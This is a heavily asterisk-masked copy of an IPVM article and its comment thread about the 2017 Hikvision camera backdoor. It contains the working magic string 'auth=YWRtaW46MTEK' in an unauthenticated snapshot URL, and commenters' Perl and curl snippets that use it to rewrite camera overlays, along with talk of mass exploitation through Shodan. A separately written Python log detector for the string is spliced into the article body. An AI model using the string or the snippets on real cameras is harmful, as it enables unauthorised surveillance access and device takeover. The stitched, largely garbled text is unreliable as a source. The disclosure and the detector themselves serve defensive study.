Hikvision Backdoor Exploit

By: Brian Karas, Published on Sep 03, 2017

Full disclosure of the Hikvision backdoor has been released, allowing easy exploitation of vulnerable Hikvision IP cameras.

As Monte Crypto, the researcher who disclosed the details, confirmed, this is:

a backdoor that allows unauthenticated impersonation of any configured user account... the vulnerability is trivial to exploit

Key points from IPVM's analysis and testing of the exploit:

  • The details prove how simple and fundamental the backdoor is.
  • The exploit is already being repurposed as a 'tool', distributed online.
  • A clear majority of Hikvision IP cameras remain vulnerable.
  • Hikvision's disclosure to date significantly misled its dealers about the severity of the backdoor.
  • Hikvision, again, has been silent, failing to inform and warn its dealers of this new disclosure.

Plus, IPVM has set up a vulnerable Hikvision IP camera so members can test and better understand the exploit.

Demonstration

We produced the following video, showing just how simple it is to use this exploit to retrieve an image snapshot and system information from a camera. We also show a password reset tool being used to take over a camera:

Inside this post, we examine how the exploit works, how it is being used, what percentage of devices are vulnerable, and Hikvision's failure to respond to the exploit's release.


Magic ****** ********

********* ******** * ***** string **** ******* ******* access ** *** ******, regardless ** **** *** admin ******** ***. *** that ****** *** ********* this ****** ** ********* camera ********:

?****=************

** *** ********** ********* in *** **********:

******** * **** ** all ***** *** ***** roles: ****://******.**/********/*****?****=************ ****** * camera ******** ******* **************: http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK *** ***** ****** calls *** ** ************ in *** **** ***, including ***** **** *** new ***** ** ***** camera ********. ******* **** Hikvision ******* **** ******* firmware ****** ** ***********, one *** ***** ********* code ** ****** ******** of ********* ** ********* devices *********** ******** **** just *** ****** **** call. *** ***** ** all, *** *** ******** camera *************: ****://******.**/******/*****************?****=************

*** ********** ********* ****** with ******** ******** ** vulnerable ** ******** ******** or ********.********* ******** * ******** fix ** ***** ********** **** ***** **** 60%+ ** ********* ******* are ***** ********** (******** below).
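For defenders, the request shape quoted above (a camera URL such as `/onvif-http/snapshot` with `?auth=YWRtaW46MTEK` appended) is easy to hunt for in web logs. The following is an added detection example, not code from IPVM or the researcher; it assumes a reverse proxy or gateway in front of the cameras writes Common Log Format lines, and it treats a 2xx status as the device having accepted the request.

```python
import base64
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Common Log Format), not captured traffic.
# Assumption: a proxy or gateway in front of the cameras records each request.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Sep/2017:10:01:12 +0000] "GET /onvif-http/snapshot?auth=YWRtaW46MTEK HTTP/1.1" 200 48211
198.51.100.23 - - [05/Sep/2017:10:01:40 +0000] "GET /index.html HTTP/1.1" 200 1822
203.0.113.7 - - [05/Sep/2017:10:02:03 +0000] "PUT /Video/inputs/channels/1/overlays/text/1?auth=YWRtaW46MTEK HTTP/1.1" 200 310
192.0.2.50 - - [05/Sep/2017:10:03:15 +0000] "GET /api/status?auth=not-base64!! HTTP/1.1" 404 0
198.51.100.9 - - [05/Sep/2017:10:04:31 +0000] "GET /onvif-http/snapshot?auth=YWRtaW46MTEK HTTP/1.1" 401 0
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})\b'
)
WRITE_METHODS = {"PUT", "POST", "DELETE"}


def decode_auth(value):
    """Return 'user:secret' if value is base64 of that form, else None."""
    try:
        padded = value + "=" * (-len(value) % 4)
        text = base64.b64decode(padded, validate=True).decode("ascii").strip()
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None
    return text if re.fullmatch(r"[\x21-\x7e]+:[\x21-\x7e]*", text) else None


def find_auth_param_requests(log_text):
    """Flag requests whose 'auth' query parameter decodes to user:secret."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        for value in parse_qs(parts.query).get("auth", []):
            # parse_qs turns '+' into a space; restore it before decoding.
            decoded = decode_auth(value.replace(" ", "+"))
            if decoded is None:
                continue
            hits.append({
                "src": m["src"],
                "time": m["ts"],
                "method": m["method"],
                "path": parts.path,
                # Keep only the account name; do not copy the secret into alerts.
                "user": decoded.split(":", 1)[0],
                "accepted": m["status"].startswith("2"),
            })
    return hits


def summarize(hits):
    """Group hits per source address so accepted writes stand out in triage."""
    summary = defaultdict(
        lambda: {"requests": 0, "accepted": 0, "writes_accepted": 0, "users": set()}
    )
    for h in hits:
        s = summary[h["src"]]
        s["requests"] += 1
        s["users"].add(h["user"])
        if h["accepted"]:
            s["accepted"] += 1
            if h["method"] in WRITE_METHODS:
                s["writes_accepted"] += 1
    return dict(summary)


if __name__ == "__main__":
    for src, info in summarize(find_auth_param_requests(SAMPLE_LOG)).items():
        print(src, info)
```

An accepted hit means the camera behind that log entry still honours the parameter and needs a firmware update and network isolation; an accepted write means its configuration should be reviewed as well.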

DHS ***** ******* - **.*

***' ******* ** **** vulnerability ** * **/**** **** **** ************** now **** *** ********** of ************ ***** ******* has **** ******. **** vulnerability ** ************* **** critical **** ***** ****** cyber ******** ************* ** the ******** ******** (*.*.:***** ******* ****** ***** Vulnerability,***** / ***** *************,**** ****** *************** **** Google ********** ********), *** ** *** ease ** *******, *** number ** ******** *******, and *** **** **** many ******** ******* (*.*., 'grey ******') ****** ** upgradeable ** ******* ********.

Hack *** ********* ******

**** *** *** * vulnerable ********* ****** ****** for ******* ** ********** with. ****** ******* ***:

****://*****************.******.***[****: **** **** ***** page **** ****** ***** password]

*******, ***** *** ******** string, **** **** *** matter ** *** *** simply ****** **************, *** example:

*** ** ************ ******** from *** ******:****://*****************.******.***/*****-****/********?****=************

*** ************ ****** ****:****://*****************.******.***/******/**********?****=************[****: *** ****** **** say "**** *** **** does *** ****** ** have *** ***** ***********”, look ** *** ****** info ******* ***** ****]

*** **** ******** ** Hikvision *** ********, *** the****** *********** *****,****** ***** *******. **** **** ******** and *********** ** *** comments.

Planted, ******** ** ************?

*** **********, ***** ******, who *** ****** **** a ******** ************, **** Hikvision **** *** ****:

** *** * ***** of ***** **** ************* left ** *** ** developers

*******, ** ******** ****:

** ** ****** ********** for * ***** ** code **** ******* ** not ** ******* ** development ** ** *****, yet ** *** **** present *** *+ *****.

Vote / ****

Password ***** **** ***** ** ****

* **** ** ***** user ********* (********* *** admin ****) *** ******** within **** ** *** exploit ************.********* ******** ***** ************ * **** ** enter ** ** ******* for * ******, ******** of * **** ** users, *** *********** ***** the ******** *** *** user. ********* *** ****** code ** **** **** shows *** "****=************" ****** being ******** ** ****** user *********.

Tool ***** ******** ****

**** ******** **** *** just ** ****** *********** change *** ******** *****'* cameras. **********, **** ** literally *** **** ********** of *** ****, ********* the ******** ******* **************'* ******* ******** *****.

300,000+ ********* ********* ******* ******** **********

**** ********* ***,***+ ******* are ******** **********, ***** on ****** **** ******* and *** ********** ******* of *** *************** ********.

******* **** *** ********* cameras***** **** **** * million ***** ******:

~**% ** * ****** of ********* ** ***** devices ****** ** **** showed **** **** **********. Using ** ******* *** from *** **** ********** announcement, ***** ********* ***** be ********** **** ******** cameras, ******* ** ***** showed ******* *********** ********* areas, *** *********, *** other ********* **** ***** put ****** ** **** of ******* **** **********:

*** ****** *** *** name ******* ** "*****" with *** **** "****** by ******* *******" **** displayed ** *** *****:

OEMs **********

**** ******** *** **** found ** *** *******, we ****** *** ********* cameras *** ***** **** vulnerable:

  • *** *********-*** ** ******** V5.4.0build ******
  • ***** **** ****** - 0E-21BF40 -****** ** ******** V5.3.0build ******

***** ********* *** ******* are ****** ********** ** well, *********** ********** *** number ** ********** ******* online *************.

Hikvision ********** *********

*********'* **** ****** *************** ****, **** ** March ****, ************* ****** their *******:

*****, ********* ****** **** a "*********-********** *************", ******** an ******** ***** **** some ******* ********** ****** to *** ****** ****** they ***** "********" ***** privileges ** * ****** role. **** ** *****, as *** ******* ****** instant ****** ****** ** any ******** ******.

******, ********* ******* ** was **** ********** ** "fairly ******** *************", ****** scans, *** ****** *****, show **** **** ******* vast ******* ** *******, the **** *********** ***** that *** ******** *** network ****** ** *** device.

*****, ********* ******* *** exploit "*** *****" ********* to "******* ** ****** with ****** ***********". *** tests, *** ***** ******* online, **** **** ** 100% ********** ** ******** devices, *** ****** *** just *********** ** "*********" with ****** ***********, ** allows **** ******* ** the ******, **** ********, and ***** ************* **** that *** ****** ********* information, **** ** ***** addresses, *** *** ****** info.

****** *********'* **** ************* to ****, ********* ********:

** **** [*** ****], Hikvision ** *** ***** of *** ******* ** malicious ******** ********** **** this *************.

Hikvision ** ********

***** *** ********* **** exploit ****** *******, ********* has **** ** ****** publicly *** ** ******* about ****, ******* **** the ******* ******** ****** examples ******* *** ** use *** ******* ******, putting ********* ** *********** risk. **** ********** ******* ** ********* failing ** *********** *** responsibility *********** ********* ** *** material ***** ** ***** products.

Comments (109)

**** ********* *********,

*** ** *** **** to ********* ********* ********** to ** ******. **** a ****** ******* *** such * **** ******** clearly ***** ***** ******.

***** ** ** **** to ***** ******, *** management:

  • ** ********* ** ****** “#1” ** *&*, **** 10,000+ ‘*********’, ** **** claim, *** **** ********* like **** ******?
  • ** ********* ** ** regain *** ***** ** their ******** *** *********, how ** **** *** proactively ****** **** ** the ***** **** **** disclosure ** *** *******?

******** *** ****** ** take *****, ****** *********:

#*) *** ** **** report ********* **** **** previous ****** ********* *** same ***** *****? ** am * ******* *********?

#*) *** ********* ***** the ******* **** *** latest *********?

#*) *** ** **** report ********* **** **** previous ****** ********* *** same ***** *****? ** am * ******* *********?

** *** ******** ******, the ******* ** *** vulnerability, *** *** ** exploit **, **** *** known. ** **** ******, *** actual ************* *** **** disclosed, *** ** ** extremely ****** ** *******. Any ********** ****** ********* to *** ******** *** be ****** ******, *** manipulated, ***** **** ********* as ****** ** * copy/paste *********.

#*) *** ********* ***** the ******* **** *** latest *********?

*********'* ****** ******** ** not ********** *************. ***** *********'* ******* cyber ******** ******, ** would ** ********** ** assume *** ****** ******** has ***** ***-**-**-********** *************** in **. ************, *** fact **** ***** *** hundreds ** ********* ** vulnerable ******* ****** ***** shows **** ****** ********* firmware **** *** ***** solve *** *******, *** need ** **** **** every ****** ** *******.

*** **** ********* (*** all ***** ************ *** that ******) ****** *** cameras **** * ******** flaw ** ******? **** cloud *** **** ******* have **** ********* *****'* a *** ** **** back ****** **'* * bad ****.

***'* *** ****** **** a *** ** *** hikvision **** ****** ******* have **** ****** **** modified ******** ******* ** Hikvision's *******. *** ** they ****** ***** *** are **** *********** *** those?

****** ******: **** ***'*. Reputable ************* *** **** tools (**** ******** ****) to ****-****** * ***** of *******, *** ***** aren't ******* ** ************ where *** *** **** dozens ** ********* ****** purchased ** *** **** of **** *****. **'* laborious ** ** ******** when *** **** * lot ** *******, ** updates *** ******* **** if **** **** ********* for **** ********. ** the ******* *** ****** the ******** ** ******** updates... ****, * **** they ***'*.

******* ** ** **** ancient **** **** **** was *********** ** ****** Basic ** *********, ** was *** **** *** to ****** *** ******* and ** **** ******* when *** ***** ** use **. ** **** for ***** *******.

***** ******* **** ***** actually **** ***** ** a ***** **** ** solve **** ******* *** that *** ******* **. for *******, **** ******* logs **** ***** *** or ** ****** **** get * ****** ****** "critical ****** ******"

** *** *** **** updates **** ***. ******** we *** ** ***** with **** *** ************ if *** **** ****** lost ***** **** * specific ******** *******. *** already *** ***** ******* in *****. ** **** release * *** *** click ****** ***. **** nice ** ****. * don’t ********** *** *** camera ************* ***’* *** this **** **** ** work.

* **** ** ** environment ***** ** ******** have **** ***+ ********* cameras, *** ** * total ** **** *,*** cameras ** *** *******.

** ********* (***** * months) ***** *** *** firmware *** *** *** cameras, *** *** ****** control *******, ** **** - *** ********** ** have ** *** ** network.

** ******, ** **** monitor ***** **** ** this *** **** ** new *************** *** **** we ******* *** ************ for ** ********* ***** (if **** **** ***), or ** ****** **** develop *** (** **** don't).

** ****** - ** also ******** **** **** of ***** ** *********** our ****** ******** ******* on **'* *** ****, using ******* ******** *******, behind * *** *** we ***** **** ***** 'default *****' ** *** equipment.

**** ** *************. * have ** ***, ***** to *** ****** *** built **** ****. ** works.

**'* ******* ** ** that ********* ****'* ****** it ******** ***. **** need ** **** ********* new ******* *** ***** working ** ***** ********.

****** ** *** **** ** ***** * ******** *****, ******!

***** **** **** *** its *********** ** **** dealings **** ******* **** or *** **** ****** do *** **** **** Hikvision *********? * **** report **** * ** told ** ********* ********* to *** *****-***** *** I ***** *** **** someone **** * ********* is *** **** *** accusing **** ** *********** of ****.

#*, ** ****, ***'* try ** ****** *** subject. ** **** **** Hikvision ******* ** '******* ********'** ***** ****** ************ on **** ********** (****** I ***** ******* *** is ****** *** **** we *********).

*** *** **** ** have **** ******* ****** and ******* ** **** companies.

***, *** ** *** you, **** **** ***** string ******** ******* ***? Why?

** **** *** ******* me **** * ****** bit. ** ***** *********** networks *** **** ******* BEHIND ***** ******** **** 99.9% ** **** *********** do. **** ** ******* example ** * ******** grabbing, ********** ***-*** **** really **** ** *****, sorry *** **** ** my **** ** *** ongoing '******' **** **** is ****** **** *** limited ************ **** **** have ********** **** *********.

#*, *** *** * loyal *******.

***, ** *** **** to ******** **** ***** string ****** ** **** customers? ** *** ***** they **** * ***** to **** ***** **** magic ****** ********?

*******........ :)

*******........ :)

****'* *** *******. *** the ********* ****** *** publicly ****** *****. *** I ** ********* **** most **** ** ****** with ***** *********, **** though ********* ******* ** know ***** * **** this ******.

** **** ******** *** they (*** *** ************'*) need ** ** ****** at ****. * **** if ******* *** *** hacked - *** ***** job ** ** ******* your **** - ****** can *** ******. ** is **** *** ********* take **** **** ********* than **** **** ** the ****. ** * had * ***** ******** college - **** ** the ***** * ***** encourage **** ** ***** asap!

**** **** - ***/*** silence ** **** **** direct ******** ** *******

******* *** ***** ***** us ** *********** **** article ** *** *******?

******* *** ***** ***** us ** *********** **** article ** *** *******?

**. ******-*********** ********** *****. ** ***** members (**** ************) ******** ****** *** * free ***** ** ****.

******* *** ***** ***** us ** *********** **** article ** *** *******?

****** * **** *** paste ***** ************* ** not *******, ** **** points ***, *** *** also *** *** "*-**** this" ****** ** *** top ** *** ******:

** *** ********* ** a ****** **** **** see *** **** ******, if *** **** ** least *** * ***** of **, (***** *****).

***** **** ** * 1-2 ***** **** *** invite *******.

**** ********** ** **** CHINA, *** * ** from **** **** *** part ** ** ******** China. *** **** ** that **** **** *** make ******** ******, *** that ***** ***** ** Security. *** ****** ** Hong **** ****** ***, they *** *** **** door *** *******.

****'* *** * *** easily ** **** **** the ******* **** **** are ***** ********** ****** change ** ****** ******* before.

** **** **** ******'* **** **** ******* ********** *** **** from ****** * ***?

******* ******* ** ******** ************** ** * **** *******.

******* *** ** *** *** *** **'* *********. **** *** still **** ********** ** ********** ***** **** ***, ***** **** day *** *** ****** ******.

***, ** **** **** definitely **** **** ****** the ***.

** **** ******* *** on * ********, ********** or ***-****** **** ** physical ***, ***'** ****. Larger ***** **** ** install **** ***.

** **** ******* *** visible ** ******** ****** your ***, ** *** can **** ****, **** any *** ****, ******** or ******** ******* *** can *** **** *******. Smaller ***** **** ** install **** ***.

***** *** **** ** exploit, ******** ****** ** moving ***** ******* **** firewalled ****'*. **** *** be **** **** **** layer-3 ******* ********, ***/** a **** ******** **** OPNSense ** ****.

****, ***** **** **** backdoor *** **********, ** malicious, *** ****** ******** block ******** ******* **** the ******* ** ****. This **** ***** *** "phone ****" ********.

*********** #*, **** **** rate ******* **** ** on *****. *** ***, that's *** * **** thing.

*** **.*% ** "****" *********** **** **** *** **** ****** threats **** **** ******.

** ****** ***** ******* you **** **** ** the *****, ********* **** country, *** ******* ** this. *** *** ** exposed ** ****? ********, greed, *** **********. *** many ***-*** ************* *** going ** ** *******? How **** ** ** to ******* ******** ** all ** ***** *******? Everyone ***** **** ******* will ** *******. ***** installations ** *********, ***********, sensitive ******... *** ***** are ***** ** ** thousands ** *** ******** of ********* ** ******* compromised **** ******. * swear, ** ******* **** Hikvision ******** ** **** down/DDoS *** *********** *******... I'm ***** ** ** furious ** *** ** you *** ******* **.

* ***'* ********** *** people **** ***** ** undisclosed ********. *** *** seems **** *** *** working ** *********.

**** ** ***********, ** is *** **:

*- **** ** ****** in *** *****.

*- ******* ** *, but ******* *** *** same: ******* ** ******* instance ****** ***'* ************, but **** * ******** public ********* **** ** whom "***" ** *** part **.

*- **** *** ** an ********** ***** ** choice.

***** *** ** **** others, *** * ***** it ** **** *** normal ** **** *** use **** ******. ** are **** ****** **** an ********, ****** ** make ****** ****.

**** ****** ** ***** one ******* **, *** specially ** *** **** testing *** ********** *** information.

** **** *** ******* me **** * ****** bit. ** ***** *********** networks *** **** ******* BEHIND ***** ******** **** 99.9% ** **** *********** do.

***...***** **** **/*** *** that ********** ****? *** numbers **** ****** **** a ********* ********* ****. Please...if *** *** ***** to ****, **** * factual "****" ****** **.

****** ****

** ******** *********** **** happen, ****'* *****.

*** ** *** *** a "********" **** ****, you **** ** **** sure **** **** ********* blackbox-testing-system ** ****** **** that **** ******** **** not ***** *** *********. It's ********** ** ** have **** ******* ** speed ** ***********, *** you **** ** **** sure (********* ***** **** great *** ****) **** your ******* **** ***** get's *** ** **** office.

* ***** **** ********* has **** *** ********/******* issues ****. ***** *** developers *** *** ***** what **** *** ***** when **** *** **** kind ** *********.

***...** **** ** * workaround ** * *********, why ****'* ** *** something **** ** ******** like "****", "*****", "********", "superuser"? *** ****** ***** like ** ******* ****** to **** ** ***********, using * ***** **** random ******....

* ********** ***** **** this **** *** ******** for **********, ******* *** string ** *** *********** to ** *** ******* purposes ****. ** ******, I **** ** ***** for ****, **'* **** my ******** ******** *** my ********** ** ******** developer **** ***** ** that ********* ** ******* here. * ***** ***** choose **** * *********** string ** * **** to **** ** *******/*********** more **** (*********** ** course).

**** ** * *****

***...** **** ** * workaround ** * *********, why ****'* ** *** something **** ** ******** like "****", "*****", "********", "superuser"? *** ****** ***** like ** ******* ****** to **** ** ***********, using * ***** **** random ******....

*** ************ ****** ** "admin:11" ******* ** ******.

**** ** * ****** approach ** ******** ********/******** combos **** ********** **********.

*** *** **** **** by ******* **** ****** into * ****** *******/*******,**** ** **** ***.

***** *** *****, * ****** ** ***** ****.

** * **** ** ******* *** ***** ***** *** ******** :-)

** **** *** **** ************* ****** ** *** ***** *** their ******** ***** ****, *** *** **** ***** *** ***** string ** **** ******** **** *******/***********?

*** ******** ***** **** is *** *********'*, ** is ** *********** ********** work, ***** ** *** of **** *******.

****** - **** *** Online

** *** *** ** our ********* *** ******* online ** ****** ***** to **** ******* **.

*** ****** ** ********** at:

****://*****************.****.***

******* ****:

*** * ******** **** the ******:****://*****************.****.***/*****-****/********?****=************

*** ****** ****:****://*****************.****.***/******/**********?****=************[****: *** ****** **** say "**** *** **** does *** ****** ** have *** ***** ***********”, look ** *** ****** info ******* ***** ****]

******* *****:

****, ***** ** ****** this **** *** ** getting *******, *** **** of **** *** ** allow ****** ** *** out **** ********, *** see *** **** **** exploit ** ** ***********. Please *** ** ******* from ******* ******** **** would ******* **.

**** ** *** ****** commands ******* *** ** do ** **** ***, and **** ** *** file. ***** *** ******* ways ** ** ****, but **** ** *** simple ******* ***** **** from * ******* ****:

*) **** * **** called "*********" *** *** the ********* **** ** it:

*** *******="*.*" ********="***-*"?> version="1.0" *****="****://***.***-***.***/*****/*********">***********> ********************> *********>

*) *** **** ** PUT *** ****, ***** with *** ****** *** to **** *** ********* function:

**** -* ********* ****://*****************.****.***/*****/********/*/*********?****=************

**** ****** ** ********* on ** * *** linux ******* ** *******, and *** ************ ** **** ****.

**** ** **** ******** in******* **********, *** ******** ** Windows **.

**, * **** **** **** **** ***** *** ******* *** not ***'*/***'*, *******?

* ***** *** **** ** * *** ********* *** *** got ** *******.

***, **** ** ******** to ********* *******.

***** * ***** **** is ******** **** ********* had **** *****, * think **'* ******** ********* that *** **** **** this **** ******* ******* and *** **** *** that ********* ******* ****** a ***** ** *** more ******* ****** ** the *******.

********* *** ***** **** of *** ******:

**** ********** ** ************ *********** **** ********, ******** easy ******* ** ********** Hikvision ** *******.

*** **** ** *** first ******* ****** ** the ******:

*** ********** ********* ****** with ******** ******** ** vulnerable ** ******** ******** or ********.********* ******** * ******** fix ** ***** ********** **** ***** **** 60%+ ** ********* ******* are ***** ********** (******** below).

******** ****** **** *** funny:

**** **, ********* ** even ****** *********** **** *****...

******* **** ******** *** **** ** ********* ** **** *****:

****** ************* ******* *********** ******* ** **********'* ********?

**** ** *****!

**** ** *********** *** I **** *** ***** in *** *****. ** biggest ******** ** *** would ****** **** ***** cameras ******** ********** *** a ****** ** ** a **** ******* ******** to *** ******? **** in *** ***** ****** network ****, *** ***** this ****** ** ******** facing *** ***? * understand *** ********** ** security, *** * ***'* trust *** ****** ** really *** ***** *** device ** ** ******** accessed ** *** ***. I ********** ** ***** is ** ******* ** DVRs ** **** ******* those *** **** ***** configured ** ** ******** accessible.

* ***** ** **** point, ***** ************ ***** to **** **** * significant **** ** ***** budget ***** ** ** allocated ** ***** ***** security ******* ** ******** if **** ****'* ***** so *******. * ******* there *** ******** ******** in ***** ******** *** hackers **** ** ****** devices **** ***** ****** share.

* ******* ***** *** probably ******** ** ***** products *** ******* **** to ****** ******* **** large ****** *****.

***** * **** ** agree **** **** *******, it ** ***** ******** out **** *** ******** of *** ***** ******** vulnerabilities ********* *** ******** from **** **** **** simplistic ** ******.

*** ************* ****, *** example, ** **** *** kind ** ***** *** would ****** **** ** early *****, *********** ******* that *** *** **** the ********* ** ******** address ***** ********.

********* ** ******** ******* when ** ***** ** cyber ********. **** **** statements ***** ***** ******** commitments, *** *** ** downplay ***** ********* ********, but **** ***** **** and *********, ***** ** no ****** *** ****** like ****-***** ************** ****** mechanisms ** ******** ********.

* ********** *****. ***** has *** **** ******. They *** ******* *** Onvif ******* *** **** when **** ******* *** other ***** *******, *** Onvif ******* ********** *** I ***** *** *** been ***** ** ** least ** ***** ************** is ****** **, *** camera ** ****** ***** in ** ********.

*** ******* **** ********* is **** **** ***** a ********* ******** **** fix ***** ******. *******, lip ******* **** **** so ***.

** ************ ***** ***** aren't ****** ******* ***** that *** ** ***** concern. *** ***** ******* is ******** ****** *** engineering *** ** **** of ****** ******** ********. It's ***** ***** **** a ****** *** ** teach ***** ************* *** to ******** ****** ***** devices ** ***** ***** circuits. **** *** ***** companies **** ***** ********* departments *** **** ***'* write ******** ***** *** when *** *** ***** specs, **** ***** ***'* know. *** ********** ****** needs ** **** *** pray **** **** *** system ** ********, **** it's * ***** ******. If ***, **** *** integrator **** ***** **** troubleshooting ** **** ******* quiet.

* ***** *** **** reason **** *** *** been ******* *** *** is **** ***** ***** are ** ******* **** are ******** ** ** used *** ******** ** are ******* ** *** security ******** *** *** up ******** ********** *** secure.

***.

******** *** *** ***** to ********** *** *****. Just *** *******.

* ***'* **** ** Dahua *** * "***** string" ******** ******. **** is * *** **** extreme.

**** ****** *** **** ******* *** ******* **** ** ** so ******* ** ****** **** ****** ****** ** *** ****** after *** ****. (** - ****** ******** ** *** ******)

* *** **** *** from ********** ******* **** camera ** *** ******** that ******** * *** of ****** ***'* **** realize ***** ******* *** on *** ********.

* ********* ** ****** to ***** *** *** port ******** ** ***** things, ******* *** ****** in, *** *** ****. I **** ** **** forward ** *** ** was ******* ********* ******* UPnP (************* *** **) defaults ** ** ** my ******.

* ******* **'* *** same *** **** ** these *********** *****, *** their **********/***********, ** **** exist, ***'* **** *** better. ****'* *** ***** are ***** ********* ******** flaws *** ****** **** not *** ** ******* with **** ********.

**** ****!

***** *. *** * **** * ****-**** ***** **** *****?

** **** ** ** will *** *** ** stuck ** * **** or **** ** ************. If *** ***** ** will, ***** ** ** me *** * *** run ** ** * different ******.

**** **** *** **** *******. ****** ** **** *** ***** 1 ******.

********** **** ** ******? ** ***** **** *** ***-*** ** back *** ** **** ****.

***** ****.

*** *** **** *** code *** **** ** test ****?

*'** **** **** *** **** *******. **** ** ****** **** just ***** *********'* *** **** *** ****. ** **** ***'* work *** **** ******* * **** * ***** ***.

**** -* *** ****://**.***.**.***/******/******/?****=************

**** -* *** ****://**.***.**.***/******/******/?****=************

* ***** ** ***** the **** *** ** the ******** ****

**** -* ****** *****************.****.***

***** *** **** **** zzfile ******** *** ******** XML *******

*** *** *** ********* result:

% ***** % ******** % ***** ******* ***** Time **** **** *******
***** ****** ***** ***** Left *****
* *** * * 0 * * * --:--:-- *:**:** --:--:-- *html>
******** *****: ****** *** Allowed
****** *****: *** -- Method *** *********>
****** *** *** ********* by **** ******* ** this ******** *>
****>
****>
*** *** *** *** 100 *** *** *** 0:00:02 *:**:** --:--:-- ***

* **** ***** * POST ******* ****

**** --******* **** -* @zzfile *****************.****.***

*** *** *** ********* result:

*****>
/>


/>

****>

****>

******.********.**** = "/***/****/*****.***?*" + (new ****()).*******();
******>

**, * ***'* **** things ******* *** *** ...

*** **** *******, **** perl ********** ****** *** you ****** ***. *** reference, *** *** ** called ** ******* *** text *** **** ** overlay, ** * *** Y *** *** *** text, *** *** ** for *** **** (*..* , ********* *..*, ********* on ****** *****):

*** *********** {
** ($*******, $****, $****, $ID) =@*;
***** "******* **** $******* on ******...\*";

$***********='*** *******="*.*" ********="***-*"?>

'.$**.'**>
***********>
'.$****.'****>
'.$****.'****>
'.$*******.'*******>
***********>';

** $******** = $**->*******(*** 'http://'.$DeviceIP.'/Video/inputs/channels/1/overlays/text/'.$ID.'?auth=YWRtaW46MTEK',
************ => '****/***',
******* => $***********);

}

**** **** ****** *** overlays (***** ** ** alternate ****** ** ****** individual ******** ** ** as ****):

*** ********** {
***** "******** ******* ****\*";
** $******** = $**->******('****://'.$********.'/*****/******/********/*/********/****/*??****=************');

}

***** *** *** ***** formatting, **** ** *****.

*** **/*++ **** ** quite **** ***.

******** *** ******* ** OpenSource ******* *** **** OS (***.**.**).

****** * *** ******* and *** "** += network" ** **** .*** file.
****** ** ******** ** QNetworkAccessManager ("**********" ** ** example) *** ******* *** "finished" ****** *** ****** processing ** ******.

.* ***********
*******:
********************** **********;

.*** ***********
****->********** = *** *********************(****);
*******(****->**********, ******(********(**************)), ****, ****(*************(**************)));

**** *.*. *** **** buttons ** **** ** and **** *** ********...

*** (********)

*************** *******;
*******.******(****("****://*****************.****.***/*****-****/********?****=************"));
****->**********->***(*******);

*** (*** ******* *)

*************** *******; *******.******(****("****://*****************.****.***/*****/******/********/*/********/****/*?****=************")); *******.*********(***************::*****************, "text/xml");
********** **** = "*** version=\"1.0\" ********=\"***-*\"?>***>***********>******>*******>****** IPVM *** **** **** demo ****!*******>***********>";
****->**********->***(*******,****);

*** *** *** *** "replyFinished"-Slot ** *****/******* ******* (e.g. **** ********* **** files ** **** ****** xml *********).

** ******, ***** * shell ** **** **** as *** ****** *****, but * **** *++ more :-)

** ******, ***** * shell ** **** **** as *** ****** *****, but * **** *++ more :-)

* ***** ******* * or *++. ***** ********* I ****** **** ****, but * *** **** pressing ****** ** **. The *** ***** * have *** ** **** a * *******, * was **** ** ****** out **** ** ** just ****** ** *** my *** ****.

** *** ***** **** to *** *** *** and *** ******** ******* in **/*++, *** * should ** **** ** make * **** ****** configuration ****...

** ******* ******** **** code (** #*'* ****** request) **** **-***** ** Shodan ** ******* *********, It ***** ** **** to ****** (** *******) many ********* ** ******* worldwide. **** ********* ***** return ***** ******* ******* they *** "******" ** stuck ** ****** *****.

**** ***** ***** *** financial ************ *** ********* if **** ******** ********* send **** ***** ******* or **** ********* ******* simultaneously.

***** ***** *** ********* to **-******** **** ***** create :)

** ******* ******** **** code (** #*'* ****** request) **** **-***** ** Shodan ** ******* *********, It ***** ** **** to ****** (** *******) many ********* ** ******* worldwide.

******. * ***** * quick ****** ** *** through * ****** ****** and **** *** *****-**** URL. ******** **** **** intentions ***** ****** ******* a ******** ** ********* cameras, ***** ***** ****** cause * **** ** support *****, * **** of ***/*********** *****, ** maybe ****?

****** **** *** ********* thing ** **...

**** ***** ***** *** financial ************ *** ********* if **** ******** ********* send **** ***** ******* or **** ********* ******* simultaneously.

**** ****** *** ******** - *** **** ** these ******* *** **** market / ******* ********? I ***'* **** *** answer *** *****'* ********* many *** ***** ***** that ********.

*** ****** ****** ***** to ******* *** ************* date. ** ** ***** be ******** ** ****** only ******* **** *** in- ** *** ** warranty ** ******* ***** to **** ********* ** benefit **** *** *******. Of ****** **** **** not **** *** **** market *******.

** ********* ***** *** this ****** ** **** cameras **** *** *** of ********, **** ***** be * **** **** to ***** ***** **** replacement *****.

********** ***** *** **** tool ** ******* ********* cameras ** ***** ****** (by *** **) ** trigger ******* *****.

***** **** ******* ** a ****** ***** ****? :)

* ***** ****** ****** not ** ***** **** forum ** ********** **** to ****, **** ** otherwise ***** ************* ** Hikvision *** ***** *********. In *** *** *** people *** **** ***** cameras ********* *** **** normal ****** *** **** on *** ******* ** keep ***** ******** ******, watch ***** ******** ** for ***** ****** *******. If ******* **** *** advice ***** **** ** could ***** * **** inconvenience *** ******** ********* harm ** ********* ** unsuspecting *** ***** *** are ********** ********

*** *********** ** **** page ***** ****** **** anyone *** ***** **** need ** ***** **** problems *** *********. * think *** *** **** about *** ** ****** automated ******* ** ***** mass *********** ** ********* should ** *******. ************ other ******* ** ******* harm **** ** ******** people *** ** ***** a ****** ** ***** a ****** **** ****** be *******.

******* * ******* **** is **** ** ******* people ***** *** ******** in *** **** ******** but *** **** ** a ***** ***** ****** can ***** *** ** hack *** ***** ****.

* ** *** **** for ** *** ********* and **** **** ******* to ****, * **** think **** ** ********* here ** ***** *** could ****** ** ******* to **** ******.

* ***** *** *** talk ***** *** ** create ********* ******* ** cause **** *********** ** Hikvision ****** ** *******

** **** *** ****** one *** ** **** are *******. ****** ********* and ******** *** **** up **** **** ******** before * ****** ****** is ****** ****** ***** it, *** ***** **'* also ***** *** ** design ******** *** **** sure ***** *********** ** safe **** **** *****.

